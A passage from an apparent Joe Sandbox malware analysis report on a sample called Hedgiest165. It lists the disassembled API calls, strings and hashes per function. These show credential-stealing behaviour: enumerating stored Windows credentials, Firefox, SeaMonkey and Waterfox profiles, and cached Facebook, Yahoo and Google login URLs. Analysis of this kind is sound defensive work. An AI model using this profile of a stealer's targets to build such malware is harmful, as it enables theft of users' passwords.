                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                        • API String ID: 2936932814-4196376884
                                                                        • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                        • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040A824
                                                                        • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                        • wcscpy.MSVCRT ref: 0040A854
                                                                        • wcscat.MSVCRT ref: 0040A86A
                                                                        • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                        • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                        • String ID: C:\Windows\system32
                                                                        • API String ID: 669240632-2896066436
                                                                        • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                        • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                        APIs
                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                        • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                        • wcslen.MSVCRT ref: 0040BE06
                                                                        • wcsncmp.MSVCRT ref: 0040BE38
                                                                        • memset.MSVCRT ref: 0040BE91
                                                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                        • wcschr.MSVCRT ref: 0040BF24
                                                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                        • String ID:
                                                                        • API String ID: 697348961-0
                                                                        • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                        • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                        • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                        • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403CBF
                                                                        • memset.MSVCRT ref: 00403CD4
                                                                        • memset.MSVCRT ref: 00403CE9
                                                                        • memset.MSVCRT ref: 00403CFE
                                                                        • memset.MSVCRT ref: 00403D13
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 00403DDA
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                        • API String ID: 4039892925-11920434
                                                                        • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                        • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403E50
                                                                        • memset.MSVCRT ref: 00403E65
                                                                        • memset.MSVCRT ref: 00403E7A
                                                                        • memset.MSVCRT ref: 00403E8F
                                                                        • memset.MSVCRT ref: 00403EA4
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 00403F6B
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                        • API String ID: 4039892925-2068335096
                                                                        • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                        • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403FE1
                                                                        • memset.MSVCRT ref: 00403FF6
                                                                        • memset.MSVCRT ref: 0040400B
                                                                        • memset.MSVCRT ref: 00404020
                                                                        • memset.MSVCRT ref: 00404035
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 004040FC
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                        • API String ID: 4039892925-3369679110
                                                                        • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                        • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                        APIs
                                                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                        • API String ID: 3510742995-2641926074
                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                        APIs
                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                        • memset.MSVCRT ref: 004033B7
                                                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                        • String ID: $0.@
                                                                        • API String ID: 2758756878-1896041820
                                                                        • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                        • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 2941347001-0
                                                                        • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                        • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                        • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                        • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                        APIs
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@
                                                                        • String ID: 8o`$@s`$Hw`
                                                                        • API String ID: 1033339047-3557277283
                                                                        • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                        • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403C09
                                                                        • memset.MSVCRT ref: 00403C1E
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                        • API String ID: 1534475566-1174173950
                                                                        • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                        • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                        APIs
                                                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                        • memset.MSVCRT ref: 00414C87
                                                                        • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 71295984-2036018995
                                                                        • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                        • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 00414458
                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                        • String ID: "%s"
                                                                        • API String ID: 1343145685-3297466227
                                                                        • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                        • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                        Strings
                                                                        Memory Dump Source
